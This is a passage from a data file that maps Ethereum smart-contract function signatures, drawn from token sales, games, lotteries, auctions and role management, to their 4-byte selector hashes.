"BONUS_50_100()": "0xf851019a", "crowdsaleStartBlock()": "0xcdd3574a", "millionInCents()": "0xfe742c6a", "MINIMUM_ETH_SOFT_CAP()": "0xf206cf74", "TOKEN_INFORMATION_ADDRESS()": "0x2d89560a", "snatchedOn()": "0x91ea4d07", "BONUS_ICO_STAGE1_PRE_SALE1()": "0xd7cbac05", "_AIExchangeSupply()": "0x18e4d2db", "curReward()": "0x8949e109", "frozenToken()": "0x6df006f3", "platformUnfreeze()": "0xde74880c", "return_owner()": "0x9810e089", "TOKEN_SALE1_NORMAL()": "0x7a4690fb", "etherHasBeenReturnedToInvestors()": "0x991a9fa9", "privateIcoMin()": "0xa6a9a099", "checkVotingForTransferWeiFromExchangeToPayment()": "0x3dfd288a", "countInvestorsRefunded()": "0x311fb64f", "BONUS2_LIMIT()": "0x1912f84f", "promotionCommisionPercent()": "0x3cccfc1b", "tranche()": "0x6ebc0af1", "TeamLockingPeriod6Months()": "0x23924cff", "ltcId()": "0x308e1b2f", "publicBattlepm2()": "0x42ed6072", "gee()": "0x5d2bafed", "STAGE_TWO_ETHRaised()": "0x8c28c16e", "tier4Time()": "0x6088caf3", "OPEN_PACKAGE_PRICE()": "0xe8b4c9d7", "gamePrice()": "0x96bf15bf", "bytePrice()": "0xbbaefe9f", "RANGEEND_9()": "0x4a5dcdc9", "monetarySupervisor()": "0x169f66df", "kingdomCreationFeeInFinney()": "0xf831aee6", "adminCharge_p3()": "0x534514ee", "miningTokenLeftInCurrent()": "0x5338b3e4", "founders()": "0x411b007e", "YouTubemasterReq()": "0xb62f0a6b", "roundBlockCount_()": "0x44b9cab5", "keeper()": "0xaced1661", "_currentSupply()": "0xa4fefad6", "BNB_TOKEN_PRICE_DENOM()": "0x2d7ed15c", "bonusState()": "0x40aec640", "bonus15end()": "0xaa29787e", "NewManager()": "0x4d80bf14", "OFFER_SIZE()": "0x4eff13dc", "getEtherValue()": "0x25b29d84", "accFoundation()": "0xe564bd4d", "MAX_TOKENS_EARLY_INVESTORS()": "0x8c324604", "emptyToWallet()": "0x51327a6a", "whiteListed()": "0x44c47561", "confirmTotalTokenThreshold()": "0xb6d703ae", "STARTING_SPERM()": "0x2becb6f7", "icoEndTimestampStage1()": "0xcc34a247", "totalDragonLotteryNumber()": "0x55a05335", "currentMood()": "0x0616cca0", "winningOutcome()": "0x9b34ae03", "HALVING_DELAY()": "0x1a1a4ed7", "isDayThirtyChecked()": "0x5474fbd3", "walletF()": "0xe3f0b761", "ShipSellMaster()": "0x563bef94", "MISCELLANEOUS_TOKENS_SUPPLY()": "0x0f6ea4fc", "sourceContract()": "0xa444ae41", "nic()": "0x804518a8", "levelOneBonus()": "0xb1401858", "total_reward()": "0xd3d2172e", "latestOrderId()": "0x6f3b60d6", "lockRate()": "0x234ea19c", "IQT_CONTRACT_ADDRESS()": "0xde62319c", "hasAccess()": "0x85a2dd15", "ALLOC_RES()": "0xcb63da4e", "unlockPurchase()": "0xc75d9d29", "HeliumNetworkAddress()": "0x5633af60", "EARLY_INVESTORS_SUPPLY_LIMIT()": "0x575b6efe", "cage()": "0x69245009", "nextWithdrawal()": "0xb7e9f193", "getRemainingEthersForCurrentRound()": "0x285c51c3", "grapesToProduceBottle()": "0x84691cd8", "setupCost()": "0x7e363ffa", "tokensPerAllocation()": "0xba885446", "merchantAccount()": "0x957f050b", "tokenSupplyCap()": "0x52058d8a", "maxTokensForSale()": "0x97f2f5c3", "HXC()": "0xf78fadc6", "currentAfterIcoPeriod()": "0x37e16f40", "VESTING_DURATION_4Y()": "0x1835e57d", "FIRSTSALE_BASE_PRICE_IN_WEI()": "0xb0a0662a", "midTimeBonusValue()": "0x072448f7", "vrcWallet()": "0x3276249f", "getVersions()": "0x6d0cc895", "TOKEN_SALE_ALLOCATION()": "0xf5ca6cd4", "Founder1()": "0xa192a425", "ICOCap()": "0x958b12b9", "releasePause()": "0xfe51717a", "highScore()": "0x1fca5278", "teamFundsAddress()": "0x75c5efd8", "companyCount()": "0x8e75dd47", "maxWeiRaised()": "0x37270069", "allocateDividendsToWinners(uint256,address[],uint256[])": "0x1dd7335c", "setDividendWinners(uint256[],uint256[],uint8[],uint256)": "0xd2536893", "setBuyDividendPercentageFee(uint8,uint256,uint256)": "0x25498152", "setSellDividendPercentageFee(uint8,uint256,uint256)": "0xe5a1eac2", "unpausePlayerContracts(uint256,uint256)": "0xb650048b", "pausePlayerContracts(uint256,uint256)": "0xdc2c928a", "allPlayerTokenContracts()": "0xeeae1f4c", "totalDividendWinners()": "0xea4354dc", "totalPlayerTokenContracts()": "0x5f227bfc", "getTotalDividendPool()": "0x755d98a3", "newInitialPlayerOffering(string,string,uint256,uint256,address,uint256,uint8)": "0xf1eb0ed9", "setReferee(address)": "0xc4a796c1", "playerCards(uint256)": "0x4dc0884f", "removeFromTokenHolders(address)": "0x80ded586", "_burnPlayerTokensFrom(address,uint256)": "0x16e32d82", "_allocatePlayerTokensTo(address,uint256)": "0xa86f7212", "setOriginalOwner(uint256,address,address)": "0xe29fa4b4", "setBuyDividendPercentageFee(uint8)": "0x0dd636ef", "setSellDividendPercentageFee(uint8)": "0xc03aac7a", "setPlayerId(uint256)": "0xef8c8944", "setBCFContractAddress(address,address)": "0x0e2f8058", "setExchangeContractAddress(address)": "0x1c7a3c9d", "tokenHoldersByIndex()": "0x406b0593", "totalTokenHolders()": "0xb4380764", "portfolioSummary(address,address)": "0x93f826c9", "buySellPrices()": "0x275a1334", "calculateTokenOnlySellPrice(uint256)": "0xd48b55e5", "calculateTokenOnlyBuyPrice(uint256)": "0x2d935d11", "calculateTokenSellPrice(uint256)": "0x06dc8949", "calculateTokenBuyPrice(uint256)": "0x09518753", "_sellTokens(uint8,address)": "0x532eb619", "_buyTokens(uint256,uint8,address,address)": "0x7779b0e4", "sellTokens(uint8)": "0x11f3eecd", "buyTokens(uint8,address)": "0x4dd36a0e", "buytokens2()": "0x599b3e21", "PermianICO()": "0x3ff1dcf6", "setCreatePrice(uint256)": "0xc2992300", "add(uint32)": "0xcbe3a072", "vote(uint32)": "0x9094c763", "isVoted()": "0x7b5bc2e4", "_add(uint32,address)": "0x8d0b3d9b", "PresidentElections()": "0xdfc89632", "SimpleChildToken(address,string,string,uint256,uint8)": "0x07549893", "PaparazzoToken()": "0x51ff1a06", "QToken()": "0xfa2a68d2", "CAIDToken()": "0x01b490ed", "changeLockTransfer(bool)": "0x5d216562", "MtTaborToken()": "0xe1fb070e", "THETOKEN()": "0xe9a5c776", "IFCC()": "0xac6b02c4", "TITSCOIN()": "0xbb3ff0bd", "manualExchange(address,uint256)": "0xd0d2e745", "GNR(address)": "0x992d4196", "zhuchu(uint256)": "0x46c017b5", "MIKETANGOBRAVO18Crowdsale(uint256,uint256,uint256,address,uint256,uint256,uint256)": "0x7aef2226", "offerToChannels(uint256)": "0xaba16a02", "processReferral(address,uint256,uint256)": "0x7ba79848", "refPercentage(address)": "0x98702402", "refAmount(address)": "0xa37d1556", "stnExchange(address,uint256)": "0xaee776ae", "TokenSale(address,address,address,uint256)": "0xb52bb6b9", "POKERCOIN()": "0x3935ae8f", "refundMany(address[])": "0xcee829ea", "releaseMany(address[])": "0xe52f64ce", "getAyantDroitEconomique_Compte_10()": "0x77e91f26", "setAyantDroitEconomique_Compte_10(uint256)": "0x9963181e", "getTitulaire_Compte_10()": "0x7fb9e405", "setTitulaire_Compte_10(uint256)": "0xd22b3de6", "getAyantDroitEconomique_Compte_9()": "0x28e8776e", "setAyantDroitEconomique_Compte_9(uint256)": "0x994cc574", "getTitulaire_Compte_9()": "0x2f335a6a", "setTitulaire_Compte_9(uint256)": "0xa5aa4348", "getAyantDroitEconomique_Compte_8()": "0x8f33c285", "setAyantDroitEconomique_Compte_8(uint256)": "0xea273277", "getTitulaire_Compte_8()": "0x4de037c7", "setTitulaire_Compte_8(uint256)": "0xc2e28dd1", "getAyantDroitEconomique_Compte_7()": "0xbe912a0a", "setAyantDroitEconomique_Compte_7(uint256)": "0xe03b3044", "getTitulaire_Compte_7()": "0x843ff6f6", "setTitulaire_Compte_7(uint256)": "0xba0b9788", "getAyantDroitEconomique_Compte_6()": "0xac232383", "setAyantDroitEconomique_Compte_6(uint256)": "0x9c960cbb", "getTitulaire_Compte_6()": "0xa1b9cb8f", "setTitulaire_Compte_6(uint256)": "0xb7c7ecbe", "getAyantDroitEconomique_Compte_5()": "0x124ff29b", "setAyantDroitEconomique_Compte_5(uint256)": "0xf8d6b70a", "getTitulaire_Compte_5()": "0xd7c0f72b", "setTitulaire_Compte_5(uint256)": "0x784aa7d2", "getAyantDroitEconomique_Compte_4()": "0x48957fb8", "setAyantDroitEconomique_Compte_4(uint256)": "0x688cf404", "getTitulaire_Compte_4()": "0x93d9fd74", "setTitulaire_Compte_4(uint256)": "0x6c30ba53", "getAyantDroitEconomique_Compte_3()": "0x190108b5", "setAyantDroitEconomique_Compte_3(uint256)": "0x3356294b", "getTitulaire_Compte_3()": "0x7141aa8b", "setTitulaire_Compte_3(uint256)": "0xdec96e7b", "getAyantDroitEconomique_Compte_2()": "0xc6c68eb7", "setAyantDroitEconomique_Compte_2(uint256)": "0x592dc0a6", "getTitulaire_Compte_2()": "0x2c87ba12", "setTitulaire_Compte_2(uint256)": "0xe2bd505b", "setBlacklist(uint32,bool)": "0xc69f4481", "setMileagePointPrice(uint256)": "0xa7c25c5a", "setGoldPrice(uint256)": "0x2d02a5b2", "getFreeSummonTimestamp(address,address)": "0xee6c2f49", "getMileagePoint(address,address)": "0xf2409d65", "transferPauseOperator(address)": "0xde223f63", "onlyPartnersOrAdmin(address)": "0x577000a3", "getCloneWallets(uint8)": "0xf420c5b1", "getMainWallets()": "0x478573ca", "changeClons(address,uint8,bool)": "0x73e2d75f", "RightAndRoles(address[])": "0x02eb4759", "getRightAndRoles()": "0xcfe643ac", "onlyRoles(address,uint16)": "0xb17922f6", "setManagerPowerful(bool)": "0xb92dd395", "changeWallet(address,uint8)": "0x4cf0afca", "getPartnerCash(uint8,address)": "0x941a4bc7", "setup(uint8,bytes32[])": "0xed4f2b33", "freeCash()": "0x6c9cb82f", "getPlayersTickets(address)": "0x2693c150", "getRafflePlayers(uint256)": "0x789a12fd", "getLatestRaffleInfo()": "0x431dbd9e", "transferGoo(address,uint256)": "0xdb86d850", "drawRandomWinner()": "0xc2de2909", "assignRafflePrize(address)": "0x1fe2d046", "awardRafflePrize(address,uint256)": "0x49c9dcf5", "buyRaffleTicket(uint256)": "0xb9de1c41", "startTokenRaffle(uint256,address,uint256)": "0xf302be42", "SponsoredItemGooRaffle()": "0x4281a651", "KruhftsToken()": "0x1b9b0b23", "Sukaya()": "0xc942940c", "destroyToken()": "0x2e4eaa15", "updateOnSaleSupply(uint256)": "0xda23d18b", "setMinAndMaxEthersForPublicSale(uint256,uint256)": "0x3a789ffb", "setTotalTokensForPublicSale(uint256)": "0x17eef4cd", "setPublicSaleParams(uint256,uint256,uint256,bool)": "0x10001fdd", "stopCrowdSale()": "0xc67c6eab", "startCrowdSale()": "0xf2b45ac1", "dispenseTokensToInvestorAddressesByValue(address[],uint256[])": "0xcfae2c65", "sendTokensToInvestors(address,uint256)": "0x870488f9", "sendTokensToOwner(uint256)": "0xf12ddd2b", "updateTokenInformation(string,string)": "0x025f9bc1", "JcashUpgradeableToken(address)": "0xd3a99388", "Ducaat()": "0xb2e30440", "change_dev(address)": "0xa3b959da", "sendAirdrop(address[],uint256[])": "0xa6ceb1f3", "Love(address,address,uint256)": "0x25f673f5", "getGenCode()": "0x526bc7fa", "saveGenCode(address,uint256,string)": "0x461ad9e9", "BountiesTokensHolder(address,address,address)": "0x84ffc422", "RIG()": "0x2fa1df4f", "DogezerPreICOCrowdsale(address,address,address,address)": "0xefcd853f", "preDGZToken()": "0xa27678c9", "OwnerWithdrawTokens(address,address,uint256)": "0xded1588c", "OwnerWithdraw()": "0x2c84d560", "refundMe()": "0x5a9e426b", "trust(uint8)": "0x2b84aabe", "distrust(address,uint256,bytes)": "0x2d162c70", "addRC(address)": "0x7c5d7980", "setInfo(string)": "0x937f6e77", "KujiraFund()": "0xadad6d50", "_limitTeamWithdraw(uint256,uint256,uint256,uint256,uint256)": "0x783d5dec", "assignToEarlyBirds(address[],uint256)": "0x91735092", "WEKUToken(address)": "0xc6a71577", "_transferToContract(address,address,uint256)": "0xea8acb67", "tokenFallback(address,address,uint256)": "0xd5356fe1", "KWRT()": "0xed7ce71a", "claimSale()": "0x454dfaaf", "transferSupply(address)": "0xb43d4851", "triggerSale(bool)": "0xd40224ec", "setblnpereth(uint256)": "0x12892b7f", "setbounty(uint256)": "0x4198e94d", "boleno()": "0xe2ecef03", "supportMessage(uint256)": "0x66533014", "addMessage(string,uint8,uint8,uint8)": "0xfa4c5dc0", "getMessagesCount()": "0x3d0c46d0", "SYCPrivateEarlyPurchase()": "0x437159de", "Bionic()": "0x10961935", "depositEth(uint256)": "0x0f4d14e9", "getEthDepositAddress()": "0xd6bf7530", "setManagerAddress(address,address)": "0x134dc5ad", "setEthDepositAddress(address,address)": "0x3b05a861", "conjureAirdrop()": "0xc2498be6", "setAirdropReceiver(address)": "0x020df957", "SBCE(uint256)": "0x923a1abb", "CRDToken()": "0x60e9f17e", "set(bytes)": "0x0399321e", "getExchangeRate(uint256)": "0x62aaf089", "endFundraising()": "0x5ebcc621", "startFundraising()": "0x81ef1b18", "BFToken()": "0xa01de7ae", "purchase(uint128)": "0x64a7cc4b", "purchaseFor(uint128,address)": "0xfeba95fb", "ProvideSale(address,address)": "0x76bfa5f6", "IrisTokenPrivatSale()": "0x76d380cb", "makeDeal(uint256,uint256,uint256,uint256,uint256,string,address,string,address,uint256,uint256)": "0xc0eaded2", "getDealsCount()": "0x594de857", "setFinished(uint256,uint256)": "0x4580cc5e", "getSplit(uint256,uint256,uint256,uint256)": "0xf4bd0eb2", "setHalted(uint256)": "0x0af4cd61", "setVerified(uint256)": "0x2d9de472", "Under_the_Hood()": "0x84ebde52", "History()": "0xc0aa18e7", "Basics()": "0x2004dff6", "sweepCommission()": "0xda82a035", "getKudosGiven(address)": "0xf4a81d08", "getKudosLeftForProject(address,address)": "0xe116b17e", "getKudosLeft(address)": "0x94f60a63", "getProjectKudos(address)": "0xec3af4a9", "register(address,uint256,bool)": "0x505ff574", "getKudosPerProject(address)": "0x72929b56", "finish()": "0xd56b2889", "ProjectKudos()": "0x918f1bb5", "forceCheck()": "0x23145ca0", "sendQuery(uint256)": "0x01518d76", "processWithdrawals()": "0x2a228fc2", "sponsorDeposit()": "0x788e26e7", "setVideoID(string,uint256)": "0xaacf5328", "YoutubeViews()": "0xb5d03751", "PreVNK(uint256,string,string,uint8)": "0x566735d8", "setIssuer(address)": "0x55cc4e57", "sweepCommission(uint256)": "0x0eb3f5a0", "claimThrone(string)": "0xb66a323c", "numberOfMonarchs()": "0xc8fdc891", "KingOfTheEtherThrone()": "0x76999896", "removeUpdater(address)": "0x04b07a5e", "addUpdater(address)": "0x43d24a5e", "update(bytes,uint256[],uint256[])": "0xd249a52e", "PriceFeed()": "0x08b7fa31", "getTimestamp(bytes)": "0x7a6e9df7", "getPrice(bytes)": "0x6b4dd158", "unregister(bytes)": "0x27d6c032", "queuePayment(bytes)": "0x02dc2e1d", "setBitcoinBridge(address)": "0x483ba09e", "collectFees(address)": "0xa480ca79", "getNumberOfParticipants()": "0xc80c28a2", "enter(bytes,bytes)": "0x54ba7daa", "Pyramid(address)": "0xa5468081", "uno(uint256)": "0x7bb6a4c6", "MyContract()": "0x6d7da0b1", "wroomWroom()": "0xd1738b72", "wroom()": "0x2262cd94", "play(uint256,uint256)": "0x7bc49a95", "LooneyFifty()": "0x5d3278f0", "notifyWinner(address,uint256)": "0xc0a963c9", "notifyPlayer(uint256)": "0x1b83b823", "allocateTickets(uint256)": "0xb94e962a", "pickWinner()": "0x5d495aea", "ownerWithdraw()": "0x4311de8f", "LooneyLottery()": "0x3169ff3e", "collectBalance()": "0x8cf4dbfb", "NextPayout()": "0xa88c5ef7", "Doubler()": "0xe977992d", "Tripler()": "0xa33d4968", "getStemPrice()": "0xb83069c5", "getDownloadPrice()": "0x279e0912", "changeAdminFromBoard(address)": "0x7ba38916", "setNewOracle(address)": "0x3d6a3664", "setNewAdmin(address)": "0x8eec99c8", "setBlockappsAddr(address)": "0x0790e880", "setAddr(uint256,address)": "0xeba36dbd", "transferRight(address,bytes)": "0xed3058e0", "transferRightIfApproved(address,bytes)": "0xb7f2f33c", "addTransaction(bytes)": "0xd50495f4", "purchase(bytes)": "0xad5c613d", "TinyHuman(address,address,address)": "0xc2fb8f36", "notifyPlayer(uint256,uint256,uint256,uint256)": "0x37ab8f20", "ownerWithdraw(uint256)": "0x33f707d1", "enter(uint8)": "0x4aa16737", "execute(uint256,uint256)": "0x5601eaea", "randomize()": "0x699b328a", "roll()": "0xcd5e3c5d", "testWinner(uint256)": "0xef7507c8", "LooneyDice()": "0x80aed05f", "acceptMember(address,string,string)": "0xc81caae7", "payExpenses(address,uint256)": "0x4f20f35a", "payFunding(uint256)": "0xea5ea470", "payHours(address,uint256)": "0x6a357465", "claimHours(int256)": "0x85f8c16d", "accessMyWallet(address)": "0x1b9f9647", "monitorWallet(address)": "0x1bad1d2e", "credit(address,uint256,uint256)": "0xddb1bdc8", "creditUpdate()": "0x70ab8ba8", "setExchange(uint256)": "0x69433e12", "setNewBudget(uint256,uint256,uint256,uint256)": "0x69c4113d", "getBudget()": "0x127714c7", "newTreasury(address)": "0x9718b524", "newCommune(address)": "0x8da4d776", "newParameters(int256,uint256,int256,uint256)": "0xac4b2bae", "getMoneyTotals()": "0xa5ebf389", "getParameters()": "0xa5ea11da", "kickOutMember(address)": "0xd9e947f3", "acceptMember(address,string)": "0x7817a60f", "communityCurrency()": "0x20909fa0", "refundStake()": "0x7c3064f1", "buyStake(bool)": "0xea851885", "participantDetails(uint256)": "0x9dbc4f9b", "numberOfParticipantsWaitingForPayout()": "0xd11f13df", "feesSeperateFromBalanceApproximately()": "0x253459e3", "nextPayoutWhenPyramidBalanceTotalsApproximately()": "0x57d4021b", "currentPyramidBalanceApproximately()": "0x09dfdc71", "GetRigData(uint256)": "0x133369c6", "GetTotalRigCount()": "0x33f8845d", "GetMinerRigsCount(address,uint256)": "0x87b57fa7", "sumOfNGeom(uint256,uint256,uint256)": "0x5634c88c", "cloneWithPopAndBottle(uint256,uint256)": "0xaa056d2a", "cloneWithTwoPops(uint256,uint256)": "0x966588d4", "changeRefresherFee(uint256)": "0xc0f4f41e", "getOwnershipForCloning(uint256)": "0xe6d3b85b", "_ownerOfPopInAnyPlatform(uint256)": "0x30725c46", "removeCooldown(uint256)": "0x8a6508ce", "setPopName(uint256,string)": "0x386e0d75", "getOwnerInAnyPlatformById(uint256)": "0x32be9502", "sellGenes(uint256,uint256)": "0x09b70ad0", "sellPop(uint256,uint256)": "0x5422cf34", "getGenesMarketAddress()": "0x7d236928", "setGenesMarketAddress(address,address)": "0x8c0b4ae5", "getGeneScienceAddress()": "0xf129c5d7", "getMarketManagerAddress()": "0x242db433", "setMarketManagerAddress(address,address)": "0x44cff104", "getAuctionManagerAddress()": "0xef98dea3", "setAuctionManagerAddress(address,address)": "0x4eb94102", "createNewAuction(uint256,uint256)": "0xee7e2039", "REPOPCore()": "0x81ff01f7", "changeSellGenesPrice(uint256,uint256)": "0x006fbd88", "getMyGenes()": "0x67085633", "getAmountOfGene(uint256)": "0x264c22bb", "getGenesForSaleBySeller(address)": "0x622ddaba", "getGenesForSale()": "0xd2ae8eaa", "purchaseGenes(uint256,uint256,bool)": "0x7fab624b", "useBottle(address,uint256)": "0x61b9c6a3", "stopSellingGenes(uint256)": "0x0af15f6e", "startSellingGenes(uint256,uint256,address)": "0x7c37605c", "GenesMarket()": "0x14679957", "changeSellPOPPrice(uint256,uint256)": "0xfa45858e", "cancelSellPop(uint256)": "0xa954736d", "sellPop(address,uint256,uint256)": "0x2e3cbb3b", "sellerOf(uint256)": "0xe05c5a83", "purchasePop(uint256)": "0xb67aa257", "getAllSalesByAddress(address)": "0x15a529b6", "getAllActiveSales()": "0xface873f", "MarketManager()": "0xfe38ed66", "_takeOwnershipOfTokenFrom(uint256,address)": "0x4f0e760a", "_takeOwnershipOfToken(uint256)": "0x917105d4", "setAuctionStartBid(uint256)": "0x885b63da", "getAuctionStartBid()": "0x84acdae7", "requiredBid(uint256)": "0x9dbc041c", "createAuction(uint256,uint256,address)": "0x54279bdd", "getAllAuctions()": "0xcbd2bdfd", "getAllActiveAuctions()": "0x2dee466d", "getERCContractAddress()": "0x6c456d0f", "setERCContract(address)": "0x05f8b0cf", "AuctionManager()": "0xdf109ee1", "_repopTransaction(address,uint256,uint256)": "0x20d71dad", "setDNA(uint256,uint256)": "0x983a7f47", "setPopNameOriginal(uint256,string)": "0x0479fcd0", "createNewPop(uint256,string)": "0x0762c317", "getPop(uint256)": "0x1d862a81", "setMetadataContractAddress(address)": "0x4d74d3b4", "getMetadataUrl(uint256)": "0x2f7b3677", "getMetadata(uint256)": "0xa574cea4", "MidasDiscountToken()": "0xd9fe1045", "EngagementToken()": "0x20183926", "hasPoolRole(address)": "0x8fda183a", "revokePoolRole(address)": "0xfa404e34", "grantPoolRole(address)": "0xe5b4003b", "exchange(address)": "0x2412bdb8", "BitcoinDublicate()": "0x21a2c72d", "USDChain(uint256,string,uint8,string)": "0xccfc9556", "XAUDToken()": "0x41be44d5", "transEther()": "0xb1bd7b80", "failUserRefund(uint256)": "0x704a60f1", "noOpenGameResult()": "0x10828bcc", "openGameResultAndNewGame(uint256,uint256,uint256,string,bytes32)": "0xc5c593e1", "_calResultReturnIsWin(uint256,uint256)": "0xae6f5bd2", "_openGameResult(uint256,uint256,uint256,string)": "0x0f4ff474", "_playRealOdds(uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0xe3343501", "openGameResult(uint256,uint256,uint256,string)": "0x4c19a199", "lockBetInfo()": "0xf56613e4", "playSingleDiceBet(uint256,uint256)": "0x52253542", "playDiceCombinations(uint256,uint256,uint256)": "0xc290367f", "playThreeDiceTotal(uint256,uint256)": "0x0dcdefa8", "playSpecificDoubles(uint256,uint256)": "0x926b33c6", "playSpecificTriples(uint256,uint256)": "0xed86d9c7", "playAnyTriples(uint256)": "0xbc50c09e", "playBigOrSmall(uint256,uint256)": "0xe84221ef", "playBatch(uint256[],uint256[])": "0x0c93c981", "_play(uint256,uint256,uint256,uint256,uint256)": "0xc467b0ff", "_newGame(bytes32)": "0x68348dfe", "newGame(bytes32)": "0x5447ad71", "setCurrentRewardNum(uint256)": "0x213d8f4a", "setAuction(address)": "0xb8c6f579", "GameSicBo(string,uint256,uint256,uint256,address)": "0x2ae67563", "_withdrawToken(address,uint256)": "0x06aef6fb", "_depositToken(address,uint256)": "0xcd64b135", "setOfficialGameUrl(string)": "0x26c4fa3d", "getEventId()": "0x4a17bbde", "tokenOf(address)": "0x42ec38e2", "setLock()": "0x7aba6f37", "unLock()": "0xed10e33c", "logPlaying(address)": "0x28c3d685", "IHPM()": "0x588f85b3", "withDrawEth(uint256)": "0x4ef83a70", "modifyCloseTime(uint256)": "0x7b8e8bdd", "modifyStartTime(uint256)": "0xb768cd5d", "sendRewardBILL(address,uint256)": "0x5aa23a52", "reFundByOther(address)": "0xced7d018", "balanceOfFund(address)": "0x291f3665", "buyBILL()": "0xc741f0f3", "Bill(address,string,uint8,string,uint256,uint256,uint256,uint256,uint256)": "0x5c0e6166", "AshCashToken()": "0x3dbb270d", "nexumToken()": "0x712394b6", "getLeaderboard(string)": "0x9bcef169", "addLeaderboard(string,string,uint256)": "0x2738bf4d", "addGame(string,address)": "0x3cfc83f5", "InfiniviToken()": "0xdd1956b0", "NitrToken()": "0x508a0a9e", "_checkAndCallSafeTransfer(address,address,uint256,uint256,bytes)": "0x124abb0a", "DailyDivs()": "0x3659078c", "AcceptsDailyDivs(address)": "0x8de69c3c", "TMSYToken(address,address,address,address,address)": "0xc6b6005b", "STribeToken()": "0x2bb4c7d5", "ESPlatts()": "0x4184907e", "getSimple()": "0x01644ea7", "Temp()": "0xbc231983", "Franc()": "0xab92670e", "PowerStandardToken(uint256,string,uint8,string)": "0x115fd072", "Hjjm()": "0xaf825c78", "multiDistribute(address[])": "0x51239fde", "isAirdropping()": "0x4cf91026", "setAirdrop(uint256,uint256,uint256,uint256,uint256)": "0xf58589ff", "CirculationSupply()": "0xfe556cf0", "DEEPPAYMENT()": "0x54dfefb4", "DMTokenC()": "0x31723abd", "getRemainUtcoin()": "0xa9a3da4a", "backUtcoinOwner()": "0x2380c39d", "Utcoin()": "0xc20f966b", "crdjetToken()": "0x430c2a69", "compensate(uint256)": "0xf46c0f29", "core(uint256,uint256,address,uint256,string,uint256)": "0xe3a8b13a", "postProduct(bytes32,bytes32,bytes1)": "0x2311dc0b", "addProduct(bytes32,uint8,uint8)": "0x94e08fc2", "ipfsGet(uint256)": "0x98842c3b", "ipfsSet(string)": "0xb393a759", "iUventaCoin()": "0x9b7f1687", "addUser(uint256)": "0xe1d81736", "getRewarder(uint256)": "0xb2eafd57", "_addUser(address,address)": "0xf850a7a4", "updateItem(uint256,string,uint256,bool)": "0xb72753d5", "createItem(string,uint256)": "0x8c551742", "getItemsCount()": "0x512dd020", "safeExchange(address,address,uint256)": "0xaac1b0b7", "setExchanger(address,address)": "0x20dce978", "setAnonymousCap(uint256)": "0x0fd8a8fb", "reduceHatchCooldown(address,uint256)": "0x9761cd63", "getHatchCooldown(uint256)": "0x5616f7df", "isHatchOnCooldown()": "0x2b9fd446", "setNewPotWinner()": "0xc4468f69", "updateTokenNameSymbolAddress(string,string,address)": "0xa7b2fc00", "getTokensBackAFterCorwdsale()": "0x3e011b11", "sendTokensAfterCrowdsale(uint256,uint256)": "0x71cbef8a", "setEtherAddress(address)": "0x58a50ce8", "burnFromContract(uint256)": "0xfc818684", "transferFromContract(address[],uint256[])": "0x51cfc731", "TabToken()": "0x0ce18afc", "unlockWorker(address,address)": "0xcb149b09", "unlockMultiple(address[])": "0xc45a6f98", "lockWorker(address,address)": "0x6b709a36", "lockMultiple(address[])": "0x6f3b4759", "nextBracket()": "0x5f8c1fce", "purchaseTokenInPublicSale()": "0x1b9ceef1", "purchaseTokenInPresale()": "0xbfdecf8c", "initTokenAndBrackets()": "0x9bb90467", "allocateTokenForAdvisor(address)": "0xa494411c", "allocateTokenForTeam(address)": "0x4e8f7fdf", "startPresale(uint256,uint256)": "0x7c4ecead", "setPresalePrice(uint256)": "0x3549345e", "changeToPublicSale()": "0x7ee5eef2", "setBracketPrice(uint256,uint256)": "0x7161c5df", "getCurrentBracket()": "0x9c88cbb6", "getSaleState()": "0x25bdb2a8", "addAdvisor(address,uint256)": "0xf54575d6", "burnMemberToken(address)": "0x5cdb0798", "getMemberTokenRemain(address)": "0x7d408b44", "setAllocateTokenDone()": "0x8dcf7892", "canBurn(address)": "0x3820a686", "gotransfer()": "0xc8299b10", "gettoken(address)": "0x7ba70bf2", "getLastDeedTimestampByAddress(string)": "0x75bac6fd", "getDeedTimestampByAddress(string,uint256)": "0xe11aa56d", "getLastDeedByAddress(string)": "0xdcaabed7", "getDeedByAddress(string,uint256)": "0x691d933a", "getNumberOfDeedsByAddress(string)": "0xa6bf45a9", "getDeedTimestamp(string)": "0xbd6fd20d", "verifyDeed(string)": "0xd18e031e", "registerDeed(string,string)": "0x64b13270", "__hasRole(uint256,uint256)": "0x9e6c0877", "__isSenderInRole(uint256)": "0xb800db55", "__isFeatureEnabled(uint256)": "0x71793195", "removeRole(address,uint256)": "0x79db5f67", "addRole(address,uint256)": "0x7fde1c8a", "Bittrees(uint256,string,string)": "0x44ae58f6", "EMJACTestToken()": "0x54ac2119", "Mystical()": "0xe266e5ad", "SFXToken()": "0xb9582195", "myx()": "0x0174e12b", "CTokenCoin()": "0xcd3b0309", "DYBToken()": "0x3eff1ef3", "dividends(bool)": "0x155f0ebc", "disable(bool)": "0xa6f2fd5c", "createDividendWithCheckpoint(uint256,uint256,uint256,int256)": "0xa3de9354", "createDividend(uint256,uint256)": "0xb9b3ded2", "TTT(string,string,uint8,uint256)": "0xd6b94aba", "removeTagByModuleType(uint8,bytes32[])": "0x1e79933f", "addTagByModuleType(uint8,bytes32[])": "0x9b77d69f", "verifyModule(address,bool)": "0xeac5ab43", "listUsersBets()": "0x6ab09a5e", "_totalUsersBets()": "0x7805dd1c", "listActiveBets()": "0x97af34db", "_totalActiveBets()": "0x005c0541", "_random()": "0x06748fb1", "_payoutWinner(uint256,uint256,uint256,uint256)": "0xf011e270", "betAgainstUser(uint256,uint256)": "0x9efeefa5", "_endBetListing(uint256)": "0x7a690951", "startBet(uint256)": "0xd20e54a8", "withdrawBank(uint256)": "0xbe2ff4a9", "depositBank()": "0x76bd4220", "userBalance()": "0xbf152765", "setDefconLevel(uint16)": "0x07e9f217", "infoWithdraw4()": "0xc0a06ecb", "infoWithdraw13()": "0x70ad858b", "infoWithdraw2()": "0x34592491", "infoWithdraw1()": "0xf48e5f27", "withdraw4()": "0x067903f9", "withdraw3()": "0x4fa3eeff", "withdraw2()": "0xea98847b", "withdraw1()": "0x0079efb0", "setTokensToBeClaimed()": "0xfe10d836", "thisContractTokenBalance()": "0x9f29e1a1", "JANUS()": "0xd53087b2", "CBO()": "0x8b490893", "MYCareCoin()": "0x781e48e4", "UBSexToken()": "0x60e45f04", "getTrade(uint256)": "0x2db25e05", "setSalary(uint256,uint256,uint256,uint256)": "0x0477d647", "createAnnoTrade(bool,uint256,uint256)": "0xc7847d19", "boardMemberCancel()": "0x7c85ab3a", "getBoardMember(address)": "0x637fcf95", "boardMemberApply(uint256)": "0x0486529b", "_mine(uint256)": "0x482d7d5a", "AnnoToken()": "0x04de40ea", 